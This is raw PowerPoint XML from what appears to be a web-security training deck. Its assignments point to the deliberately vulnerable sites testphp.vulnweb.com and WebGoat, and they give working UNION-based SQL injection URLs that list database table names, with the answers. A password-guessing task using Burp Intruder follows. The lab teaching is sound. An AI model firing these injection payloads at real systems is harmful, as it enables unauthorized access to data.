              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#14</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can you find out the table name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: try union statement &amp; select statement]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{55132384-7F33-47AB-8D2C-FFC8D31621F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5104371"/>
            <a:ext cx="12030075" cy="66937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31740" rIns="0" bIns="82524"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4C4F53"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US"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Muli"/>
              </a:rPr>
              <a:t>From the screenshot you read can the name of the first table is </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t>artists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73522318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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#15</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can you find out the 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> table name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: try union statement &amp; select statement]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{66EE9CC0-654F-485A-953E-83A8324973D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="95250" y="5391848"/>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31740" rIns="0" bIns="82524"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4C4F53"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US"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Muli"/>
              </a:rPr>
              <a:t>From the screenshot you can read the name of the second table is </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t>carts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71158430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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can you find out the 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> table name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: try union statement &amp; select statement]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{943D9169-5876-4493-9DE2-0DF7B6A54A47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="85725" y="5486272"/>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31740" rIns="0" bIns="82524"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4C4F53"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US"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Muli"/>
              </a:rPr>
              <a:t>We got table 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Muli"/>
              </a:rPr>
              <a:t>categ</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16874394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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#17</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Forgot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Guess the username, then secret question &amp; crack the password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[hint: try Burp Intruder]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203271543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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assignment#18</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
